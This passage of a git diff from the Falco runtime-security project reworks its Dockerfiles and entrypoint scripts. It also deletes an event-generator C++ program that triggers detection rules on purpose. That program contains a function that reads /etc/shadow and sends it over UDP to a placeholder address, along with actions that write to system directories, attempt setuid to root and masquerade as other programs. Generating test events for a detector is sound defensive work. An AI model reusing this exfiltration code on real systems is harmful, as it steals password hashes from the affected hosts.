-    && curl -o libmpfr4_3.1.3-2_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libmpfr4_3.1.3-2_amd64.deb \
-    && curl -o libisl15_0.18-1_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libisl15_0.18-1_amd64.deb \
-    && dpkg -i cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb \
-    && rm -f cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb
-
-# gcc 5 is no longer included in debian unstable, but we need it to
-# build centos kernels, which are 3.x based and explicitly want a gcc
-# version 3, 4, or 5 compiler. So grab copies we've saved from debian
-# snapshots with the prefix https://snapshot.debian.org/archive/debian/20190122T000000Z.
-
-RUN curl -o cpp-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/cpp-5_5.5.0-12_amd64.deb \
- && curl -o gcc-5-base_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5-base_5.5.0-12_amd64.deb \
- && curl -o gcc-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5_5.5.0-12_amd64.deb \
- && curl -o libasan2_5.5.0-12_amd64.deb	https://s3.amazonaws.com/download.draios.com/dependencies/libasan2_5.5.0-12_amd64.deb \
- && curl -o libgcc-5-dev_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libgcc-5-dev_5.5.0-12_amd64.deb \
- && curl -o libisl15_0.18-4_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libisl15_0.18-4_amd64.deb \
- && curl -o libmpx0_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libmpx0_5.5.0-12_amd64.deb \
- && dpkg -i cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb \
- && rm -f cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb
-
-# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
-# default to gcc-5.
-RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
-
-RUN rm -rf /usr/bin/clang \
- && rm -rf /usr/bin/llc \
- && ln -s /usr/bin/clang-7 /usr/bin/clang \
- && ln -s /usr/bin/llc-7 /usr/bin/llc
-
-RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
- && curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \
- && apt-get update \
- && apt-get install -y --no-install-recommends falco \
- && apt-get clean \
- && rm -rf /var/lib/apt/lists/*
-
-# Change the falco config within the container to enable ISO 8601
-# output.
-RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
- && mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
-
-# Some base images have an empty /lib/modules by default
-# If it's not empty, docker build will fail instead of
-# silently overwriting the existing directory
-RUN rm -df /lib/modules \
- && ln -s $SYSDIG_HOST_ROOT/lib/modules /lib/modules
-
-# debian:unstable head contains binutils 2.31, which generates
-# binaries that are incompatible with kernels < 4.16. So manually
-# forcibly install binutils 2.30-22 instead.
-RUN curl -s -o binutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils_2.30-22_amd64.deb \
- && curl -s -o libbinutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libbinutils_2.30-22_amd64.deb \
- && curl -s -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
- && curl -s -o binutils-common_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-common_2.30-22_amd64.deb \
- && dpkg -i *binutils*.deb \
- && rm -f *binutils*.deb
-
-COPY ./docker-entrypoint.sh /
-
-ENTRYPOINT ["/docker-entrypoint.sh"]
-
-CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]
--- a/docker/driver-loader/Dockerfile
+++ b/docker/driver-loader/Dockerfile
@@ -0,0 +1,13 @@
+ARG FALCO_IMAGE_TAG=latest
+FROM falcosecurity/falco:${FALCO_IMAGE_TAG}
+
+LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+
+LABEL usage="docker run -i -t -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
+
+ENV HOST_ROOT /host
+ENV HOME /root
+
+COPY ./docker-entrypoint.sh /
+
+ENTRYPOINT ["/docker-entrypoint.sh"]
--- a/docker/driver-loader/docker-entrypoint.sh
+++ b/docker/driver-loader/docker-entrypoint.sh
@@ -1,7 +1,7 @@
+#!/usr/bin/env bash
 #
-# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
+# Copyright (C) 2020 The Falco Authors.
 #
-# This file is part of falco .
 #
 # Licensed under the Apache License, Version 2.0 (the "License");
 # you may not use this file except in compliance with the License.
@@ -15,5 +15,14 @@
 # See the License for the specific language governing permissions and
 # limitations under the License.
 #
-image:
-	docker build -t sysdig/falco-event-generator:latest .
+
+
+echo "* Setting up /usr/src links from host"
+
+for i in "$HOST_ROOT/usr/src"/*
+do
+    base=$(basename "$i")
+    ln -s "$i" "/usr/src/$base"
+done
+
+/usr/bin/falco-driver-loader "$@"
--- a/docker/event-generator/Dockerfile
+++ b/docker/event-generator/Dockerfile
@@ -1,6 +0,0 @@
-FROM alpine:latest
-RUN apk add --no-cache bash g++
-COPY ./event_generator.cpp /usr/local/bin
-RUN mkdir -p /var/lib/rpm
-RUN g++ --std=c++0x /usr/local/bin/event_generator.cpp -o /usr/local/bin/event_generator
-CMD ["/usr/local/bin/event_generator"]
--- a/docker/event-generator/event_generator.cpp
+++ b/docker/event-generator/event_generator.cpp
@@ -1,523 +0,0 @@
-/*
-Copyright (C) 2016-2018 Draios Inc dba Sysdig.
-
-This file is part of falco.
-
-Licensed under the Apache License, Version 2.0 (the "License");
-you may not use this file except in compliance with the License.
-You may obtain a copy of the License at
-
-    http://www.apache.org/licenses/LICENSE-2.0
-
-Unless required by applicable law or agreed to in writing, software
-distributed under the License is distributed on an "AS IS" BASIS,
-WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-See the License for the specific language governing permissions and
-limitations under the License.
-
-*/
-
-#include <cstdio>
-#include <utility>
-#include <map>
-#include <set>
-#include <string>
-#include <fstream>
-#include <sstream>
-#include <cstring>
-#include <cstdlib>
-#include <unistd.h>
-#include <getopt.h>
-#include <sys/errno.h>
-#include <sys/types.h>
-#include <sys/stat.h>
-#include <sys/wait.h>
-#include <pwd.h>
-#include <sys/socket.h>
-#include <arpa/inet.h>
-
-using namespace std;
-
-void usage(char *program)
-{
-	printf("Usage %s [options]\n\n", program);
-	printf("Options:\n");
-	printf("     -h/--help: show this help\n");
-	printf("     -a/--action: actions to perform. Can be one of the following:\n");
-	printf("          write_binary_dir                           Write to files below /bin\n");
-	printf("          write_etc                                  Write to files below /etc\n");
-	printf("          read_sensitive_file                        Read a sensitive file\n");
-	printf("          read_sensitive_file_after_startup          As a trusted program, wait a while,\n");
-	printf("                                                     then read a sensitive file\n");
-	printf("          write_rpm_database                         Write to files below /var/lib/rpm\n");
-	printf("          spawn_shell                                Run a shell (bash)\n");
-	printf("                                                     Used by spawn_shell_under_httpd below\n");
-	printf("          spawn_shell_under_httpd                    Run a shell (bash) under a httpd process\n");
-	printf("          db_program_spawn_process                   As a database program, try to spawn\n");
-	printf("                                                     another program\n");
-	printf("          modify_binary_dirs                         Modify a file below /bin\n");
-	printf("          mkdir_binary_dirs                          Create a directory below /bin\n");
-	printf("          change_thread_namespace                    Change namespace\n");
-	printf("          system_user_interactive                    Change to a system user and try to\n");
-	printf("                                                     run an interactive command\n");
-	printf("          network_activity                           Open network connections\n");
-	printf("                                                     (used by system_procs_network_activity below)\n");
-	printf("          system_procs_network_activity              Open network connections as a program\n");
-	printf("                                                     that should not perform network actions\n");
-	printf("          non_sudo_setuid                            Setuid as a non-root user\n");
-	printf("          create_files_below_dev                     Create files below /dev\n");
-	printf("          exec_ls                                    execve() the program ls\n");
-	printf("                                                     (used by user_mgmt_binaries, db_program_spawn_process)\n");
-	printf("          user_mgmt_binaries                         Become the program \"vipw\", which triggers\n");
-	printf("                                                     rules related to user management programs\n");
-	printf("          exfiltration                               Read /etc/shadow and send it via udp to a\n");
-	printf("                                                     specific address and port\n");
-	printf("          all                                        All of the above\n");
-	printf("       The action can also be specified via the environment variable EVENT_GENERATOR_ACTIONS\n");
-	printf("           as a colon-separated list\n");
-	printf("       if specified, -a/--action overrides any environment variables\n");
-	printf("     -i/--interval: Number of seconds between actions\n");
-	printf("     -o/--once: Perform actions once and exit\n");
-}
-
-void open_file(const char *filename, const char *flags)
-{
-	FILE *f = fopen(filename, flags);
-	if(f)
-	{
-		fclose(f);
-	}
-	else
-	{
-		fprintf(stderr, "Could not open %s for writing: %s\n", filename, strerror(errno));
-	}
-
-}
-
-void exfiltration()
-{
-	ifstream shadow;
-
-	shadow.open("/etc/shadow");
-
-	printf("Reading /etc/shadow and sending to 10.5.2.6:8197...\n");
-
-	if(!shadow.is_open())
-	{
-		fprintf(stderr, "Could not open /etc/shadow for reading: %s", strerror(errno));
-		return;
-	}
-
-	string line;
-	string shadow_contents;
-	while (getline(shadow, line))
-	{
-		shadow_contents += line;
-		shadow_contents += "\n";
-	}
-
-	int rc;
-	ssize_t sent;
-	int sock = socket(PF_INET, SOCK_DGRAM, 0);
-	struct sockaddr_in dest;
-
-	dest.sin_family = AF_INET;
-	dest.sin_port = htons(8197);
-	inet_aton("10.5.2.6", &(dest.sin_addr));
-
-	if((rc = connect(sock, (struct sockaddr *) &dest, sizeof(dest))) != 0)
-	{
-		fprintf(stderr, "Could not bind listening socket to dest: %s\n", strerror(errno));
-		return;
-	}
-
-	if ((sent = send(sock, shadow_contents.c_str(), shadow_contents.size(), 0)) != shadow_contents.size())
-	{
-		fprintf(stderr, "Could not send shadow contents via udp datagram: %s\n", strerror(errno));
-		return;
-	}
-
-	close(sock);
-}
-
-void touch(const char *filename)
-{
-	open_file(filename, "w");
-}
-
-void read(const char *filename)
-{
-	open_file(filename, "r");
-}
-
-uid_t become_user(const char *user)
-{
-	struct passwd *pw;
-	pw = getpwnam(user);
-	if(pw == NULL)
-	{
-		fprintf(stderr, "Could not find user information for \"%s\" user: %s\n", user, strerror(errno));
-		exit(1);
-	}
-
-	int rc = setuid(pw->pw_uid);
-
-	if(rc != 0)
-	{
-		fprintf(stderr, "Could not change user to \"%s\" (uid %u): %s\n", user, pw->pw_uid, strerror(errno));
-		exit(1);
-	}
-}
-
-void spawn(const char *cmd, char **argv, char **env)
-{
-	pid_t child;
-
-	// Fork a process, that way proc.duration is reset
-	if ((child = fork()) == 0)
-	{
-		execve(cmd, argv, env);
-		fprintf(stderr, "Could not exec to spawn %s: %s\n", cmd, strerror(errno));
-	}
-	else
-	{
-		int status;
-		waitpid(child, &status, 0);
-	}
-}
-
-void respawn(const char *cmd, const char *action, const char *interval)
-{
-	char *argv[] = {(char *) cmd,
-			(char *) "--action", (char *) action,
-			(char *) "--interval", (char *) interval,
-			(char *) "--once", NULL};
-
-	char *env[] = {NULL};
-
-	spawn(cmd, argv, env);
-}
-
-void write_binary_dir() {
-	printf("Writing to /bin/created-by-event-generator-sh...\n");
-	touch("/bin/created-by-event-generator-sh");
-}
-
-void write_etc() {
-	printf("Writing to /etc/created-by-event-generator-sh...\n");
-	touch("/etc/created-by-event-generator-sh");
-}
-
-void read_sensitive_file() {
-	printf("Reading /etc/shadow...\n");
-	read("/etc/shadow");
-}
-
-void read_sensitive_file_after_startup() {
-	printf("Becoming the program \"httpd\", sleeping 6 seconds and reading /etc/shadow...\n");
-	respawn("./httpd", "read_sensitive_file", "6");
-}
-
-void write_rpm_database() {
-	printf("Writing to /var/lib/rpm/created-by-event-generator-sh...\n");
-	touch("/var/lib/rpm/created-by-event-generator-sh");
-}
-
-void spawn_shell() {
-	printf("Spawning a shell to run \"ls > /dev/null\" using system()...\n");
-	int rc;
-
-	if ((rc = system("ls > /dev/null")) != 0)
-	{
-		fprintf(stderr, "Could not run ls > /dev/null in a shell: %s\n", strerror(errno));
-	}
-}
-
-void spawn_shell_under_httpd() {
-	printf("Becoming the program \"httpd\" and then spawning a shell\n");
-	respawn("./httpd", "spawn_shell", "0");
-}
-
-void db_program_spawn_process() {
-	printf("Becoming the program \"mysql\" and then running ls\n");
-	respawn("./mysqld", "exec_ls", "0");
-}
-
-void modify_binary_dirs() {
-	printf("Moving /bin/true to /bin/true.event-generator-sh and back...\n");
-
-	if (rename("/bin/true", "/bin/true.event-generator-sh") != 0)
-	{
-		fprintf(stderr, "Could not rename \"/bin/true\" to \"/bin/true.event-generator-sh\": %s\n", strerror(errno));
-	}
-	else
-	{
-		if (rename("/bin/true.event-generator-sh", "/bin/true") != 0)
-		{
-			fprintf(stderr, "Could not rename \"/bin/true.event-generator-sh\" to \"/bin/true\": %s\n", strerror(errno));
-		}
-	}
-}
-
-void mkdir_binary_dirs() {
-	printf("Creating directory /bin/directory-created-by-event-generator-sh...\n");
-	if (mkdir("/bin/directory-created-by-event-generator-sh", 0644) != 0)
-	{
-		fprintf(stderr, "Could not create directory \"/bin/directory-created-by-event-generator-sh\": %s\n", strerror(errno));
-	}
-}
-
-void change_thread_namespace() {
-	printf("Calling setns() to change namespaces...\n");
-	printf("NOTE: does not result in a falco notification in containers, unless container run with --privileged or --security-opt seccomp=unconfined\n");
-	// It doesn't matter that the arguments to setns are
-	// bogus. It's the attempt to call it that will trigger the
-	// rule.
-	setns(0, 0);
-}
-
-void system_user_interactive() {
-	pid_t child;
-
-	printf("Forking a child that becomes user=daemon and then tries to run /bin/login...\n");
-	// Fork a child and do everything in the child.
-	if ((child = fork()) == 0)
-	{
-		become_user("daemon");
-		char *argv[] = {(char *)"/bin/login", NULL};
-		char *env[] = {NULL};
-		spawn("/bin/login", argv, env);
-		exit(0);
-	}
-	else
-	{
-		int status;
-		waitpid(child, &status, 0);
-	}
-}
-
-void network_activity() {
-	printf("Connecting a udp socket to 10.2.3.4:8192...\n");
-	int rc;
-	int sock = socket(PF_INET, SOCK_DGRAM, 0);
-	struct sockaddr_in localhost;
-
-	localhost.sin_family = AF_INET;
-	localhost.sin_port = htons(8192);
-	inet_aton("10.2.3.4", &(localhost.sin_addr));
-
-	if((rc = connect(sock, (struct sockaddr *) &localhost, sizeof(localhost))) != 0)
-	{
-		fprintf(stderr, "Could not bind listening socket to localhost: %s\n", strerror(errno));
-		return;
-	}
-
-	close(sock);
-}
-
-void system_procs_network_activity() {
-	printf("Becoming the program \"sha1sum\" and then performing network activity\n");
-	respawn("./sha1sum", "network_activity", "0");
-}
-
-void non_sudo_setuid() {
-	pid_t child;
-
-	printf("Forking a child that becomes \"daemon\" user and then \"root\"...\n");
-
-	// Fork a child and do everything in the child.
-	if ((child = fork()) == 0)
-	{
-		// First setuid to something non-root. Then try to setuid back to root.
-		become_user("daemon");
-		become_user("root");
-		exit(0);
-	}
-	else
-	{
-		int status;
-		waitpid(child, &status, 0);
-	}
-}
-
-void create_files_below_dev() {
-	printf("Creating /dev/created-by-event-generator-sh...\n");
-	touch("/dev/created-by-event-generator-sh");
-}
-
-void exec_ls()
-{
-	char *argv[] = {(char *)"/bin/ls", NULL};
-	char *env[] = {NULL};
-	spawn("/bin/ls", argv, env);
-}
-
-void user_mgmt_binaries() {
-	printf("Becoming the program \"vipw\" and then running the program /bin/ls\n");
-	printf("NOTE: does not result in a falco notification in containers\n");
-	respawn("./vipw", "exec_ls", "0");
-}
-
-typedef void (*action_t)();
-
-map<string, action_t> defined_actions = {{"write_binary_dir", write_binary_dir},
-					 {"write_etc", write_etc},
-					 {"read_sensitive_file", read_sensitive_file},
-					 {"read_sensitive_file_after_startup", read_sensitive_file_after_startup},
-					 {"write_rpm_database", write_rpm_database},
-					 {"spawn_shell", spawn_shell},
-					 {"spawn_shell_under_httpd", spawn_shell_under_httpd},
-					 {"db_program_spawn_process", db_program_spawn_process},
-					 {"modify_binary_dirs", modify_binary_dirs},
-					 {"mkdir_binary_dirs", mkdir_binary_dirs},
-					 {"change_thread_namespace", change_thread_namespace},
-					 {"system_user_interactive", system_user_interactive},
-					 {"network_activity", network_activity},
-					 {"system_procs_network_activity", system_procs_network_activity},
-					 {"non_sudo_setuid", non_sudo_setuid},
-					 {"create_files_below_dev", create_files_below_dev},
-					 {"exec_ls", exec_ls},
-					 {"user_mgmt_binaries", user_mgmt_binaries},
-					 {"exfiltration", exfiltration}};
-
-// Some actions don't directly result in suspicious behavior. These
-// actions are excluded from the ones run with -a all.
-set<string> exclude_from_all_actions = {"spawn_shell", "exec_ls", "network_activity"};
-
-void create_symlinks(const char *program)
-{
-	int rc;
-
-	// Some actions depend on this program being re-run as
-	// different program names like 'mysqld', 'httpd', etc. This
-	// sets up all the required symlinks.
-	const char *progs[] = {"./httpd", "./mysqld", "./sha1sum", "./vipw", NULL};
-
-	for (unsigned int i=0; progs[i] != NULL; i++)
-	{
-		unlink(progs[i]);
-
-		if ((rc = symlink(program, progs[i])) != 0)
-		{
-			fprintf(stderr, "Could not link \"./event_generator\" to \"%s\": %s\n", progs[i], strerror(errno));
-		}
-	}
-}
-
-void run_actions(map<string, action_t> &actions, int interval, bool once)
-{
-	while (true)
-	{
-		for (auto action : actions)
-		{
-			printf("***Action %s\n", action.first.c_str());
-			action.second();
-			sleep(interval);
-		}
-		if(once)
-		{
-			break;
-		}
-	}
-}
-
-int main(int argc, char **argv)
-{
-	map<string, action_t> actions;
-	int op;
-	int long_index = 0;
-	int interval = 1;
-	bool once = false;
-	map<string, action_t>::iterator it;
-
-	static struct option long_options[] =
-	{
-		{"help", no_argument, 0, 'h' },
-		{"action", required_argument, 0, 'a' },
-		{"interval", required_argument, 0, 'i' },
-		{"once", no_argument, 0, 'o' },
-
-		{0, 0}
-	};
-
-	//
-	// Parse the args
-	//
-	while((op = getopt_long(argc, argv,
-				"ha:i:l:o",
-				long_options, &long_index)) != -1)
-	{
-		switch(op)
-		{
-		case 'h':
-			usage(argv[0]);
-			exit(1);
-		case 'a':
-			// "all" is already implied
-			if (strcmp(optarg, "all") != 0)
-			{
-				if((it = defined_actions.find(optarg)) == defined_actions.end())
-				{
-					fprintf(stderr, "No action with name \"%s\" known, exiting.\n", optarg);
-					exit(1);
-				}
-				actions.insert(*it);
-			}
-			break;
-		case 'i':
-			interval = atoi(optarg);
-			break;
-		case 'o':
-			once = true;
-			break;
-		default:
-			usage(argv[0]);
-			exit(1);
-		}
-	}
-
-	//
-        // Also look for actions in the environment. If specified, they
-        // override any specified on the command line.
-	//
-	char *env_action = getenv("EVENT_GENERATOR_ACTIONS");
-
-	if(env_action)
-	{
-		actions.clear();
-
-		string envs(env_action);
-		istringstream ss(envs);
-		string item;
-		while (std::getline(ss, item, ':'))
-		{
-			if((it = defined_actions.find(item)) == defined_actions.end())
-			{
-				fprintf(stderr, "No action with name \"%s\" known, exiting.\n", item.c_str());
-				exit(1);
-			}
-			actions.insert(*it);
-		}
-	}
-
-	if(actions.size() == 0)
-	{
-		for(auto &act : defined_actions)
-		{
-			if(exclude_from_all_actions.find(act.first) == exclude_from_all_actions.end())
-			{
-				actions.insert(act);
-			}
-		}
-	}
-
-	setvbuf(stdout, NULL, _IONBF, 0);
-	setvbuf(stderr, NULL, _IONBF, 0);
-	// Only create symlinks when running as the program event_generator
-	if (strstr(argv[0], "generator"))
-	{
-		create_symlinks(argv[0]);
-	}
-
-	run_actions(actions, interval, once);
-}
--- a/docker/falco/Dockerfile
+++ b/docker/falco/Dockerfile
@@ -0,0 +1,110 @@
+FROM debian:stable
+
+LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+
+LABEL usage="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
+
+ARG FALCO_VERSION=latest
+ARG VERSION_BUCKET=deb
+ENV VERSION_BUCKET=${VERSION_BUCKET}
+
+ENV FALCO_VERSION=${FALCO_VERSION}
+ENV HOST_ROOT /host
+ENV HOME /root
+
+RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
+
+RUN apt-get update \
+	&& apt-get install -y --no-install-recommends \
+	bash-completion \
+	bc \
+	clang-7 \
+	ca-certificates \
+	curl \
+	dkms \
+	gnupg2 \
+	gcc \
+	jq \
+	libc6-dev \
+	libelf-dev \
+	libmpx2 \
+	llvm-7 \
+	netcat \
+	xz-utils \
+	&& rm -rf /var/lib/apt/lists/*
+
+# gcc 6 is no longer included in debian stable, but we need it to
+# build kernel modules on the default debian-based ami used by
+# kops. So grab copies we've saved from debian snapshots with the
+# prefix https://snapshot.debian.org/archive/debian/20170517T033514Z
+# or so.
+
+RUN curl -L -o cpp-6_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/cpp-6_6.3.0-18_amd64.deb \
+	&& curl -L -o gcc-6-base_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-6-base_6.3.0-18_amd64.deb \
+	&& curl -L -o gcc-6_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-6_6.3.0-18_amd64.deb \
+	&& curl -L -o libasan3_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libasan3_6.3.0-18_amd64.deb \
+	&& curl -L -o libcilkrts5_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libcilkrts5_6.3.0-18_amd64.deb \
+	&& curl -L -o libgcc-6-dev_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libgcc-6-dev_6.3.0-18_amd64.deb \
+	&& curl -L -o libubsan0_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libubsan0_6.3.0-18_amd64.deb \
+	&& curl -L -o libmpfr4_3.1.3-2_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libmpfr4_3.1.3-2_amd64.deb \
+	&& curl -L -o libisl15_0.18-1_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libisl15_0.18-1_amd64.deb \
+	&& dpkg -i cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb \
+	&& rm -f cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb
+
+# gcc 5 is no longer included in debian stable, but we need it to
+# build centos kernels, which are 3.x based and explicitly want a gcc
+# version 3, 4, or 5 compiler. So grab copies we've saved from debian
+# snapshots with the prefix https://snapshot.debian.org/archive/debian/20190122T000000Z.
+
+RUN curl -L -o cpp-5_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/cpp-5_5.5.0-12_amd64.deb \
+	&& curl -L -o gcc-5-base_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-5-base_5.5.0-12_amd64.deb \
+	&& curl -L -o gcc-5_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-5_5.5.0-12_amd64.deb \
+	&& curl -L -o libasan2_5.5.0-12_amd64.deb	https://dl.bintray.com/falcosecurity/dependencies/libasan2_5.5.0-12_amd64.deb \
+	&& curl -L -o libgcc-5-dev_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libgcc-5-dev_5.5.0-12_amd64.deb \
+	&& curl -L -o libisl15_0.18-4_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libisl15_0.18-4_amd64.deb \
+	&& curl -L -o libmpx0_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libmpx0_5.5.0-12_amd64.deb \
+	&& dpkg -i cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb \
+	&& rm -f cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb
+
+# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
+# default to gcc-5.
+RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
+
+RUN rm -rf /usr/bin/clang \
+	&& rm -rf /usr/bin/llc \
+	&& ln -s /usr/bin/clang-7 /usr/bin/clang \
+	&& ln -s /usr/bin/llc-7 /usr/bin/llc
+
+RUN curl -s https://falco.org/repo/falcosecurity-3672BA8F.asc | apt-key add - \
+	&& echo "deb https://dl.bintray.com/falcosecurity/${VERSION_BUCKET} stable main" | tee -a /etc/apt/sources.list.d/falcosecurity.list \
+	&& apt-get update -y \
+	&& if [ "$FALCO_VERSION" = "latest" ]; then apt-get install -y --no-install-recommends falco; else apt-get install -y --no-install-recommends falco=${FALCO_VERSION}; fi \
+	&& apt-get clean \
+	&& rm -rf /var/lib/apt/lists/*
+
+# Change the falco config within the container to enable ISO 8601
+# output.
+RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
+	&& mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
+
+# Some base images have an empty /lib/modules by default
+# If it's not empty, docker build will fail instead of
+# silently overwriting the existing directory
+RUN rm -df /lib/modules \
+	&& ln -s $HOST_ROOT/lib/modules /lib/modules
+
+# debian:stable head contains binutils 2.31, which generates
+# binaries that are incompatible with kernels < 4.16. So manually
+# forcibly install binutils 2.30-22 instead.
+RUN curl -L -o binutils_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils_2.30-22_amd64.deb \
+	&& curl -L -o libbinutils_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libbinutils_2.30-22_amd64.deb \
+	&& curl -L -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
+	&& curl -L -o binutils-common_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils-common_2.30-22_amd64.deb \
+	&& dpkg -i *binutils*.deb \
+	&& rm -f *binutils*.deb
+
+COPY ./docker-entrypoint.sh /
+
+ENTRYPOINT ["/docker-entrypoint.sh"]
+
+CMD ["/usr/bin/falco"]
--- a/docker/falco/docker-entrypoint.sh
+++ b/docker/falco/docker-entrypoint.sh
@@ -1,8 +1,7 @@
-#!/bin/bash
+#!/usr/bin/env bash
 #
-# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
+# Copyright (C) 2020 The Falco Authors.
 #
-# This file is part of falco.
 #
 # Licensed under the Apache License, Version 2.0 (the "License");
 # you may not use this file except in compliance with the License.
@@ -17,19 +16,23 @@
 # limitations under the License.
 #

-#set -e
-
-# Set the SYSDIG_SKIP_LOAD variable to skip loading the sysdig kernel module
-
-if [[ -z "${SYSDIG_SKIP_LOAD}" ]]; then
-    echo "* Setting up /usr/src links from host"
-
-    for i in $(ls $SYSDIG_HOST_ROOT/usr/src)
-    do
-        ln -s $SYSDIG_HOST_ROOT/usr/src/$i /usr/src/$i
-    done
-
-    /usr/bin/falco-probe-loader
+# todo(leogr): remove deprecation notice within a couple of releases
+if [[ ! -z "${SKIP_MODULE_LOAD}" ]]; then
+    echo "* SKIP_MODULE_LOAD is deprecated and will be removed soon, use SKIP_DRIVER_LOADER instead"
 fi

-exec "$@"
+# Set the SKIP_DRIVER_LOADER variable to skip loading the driver
+
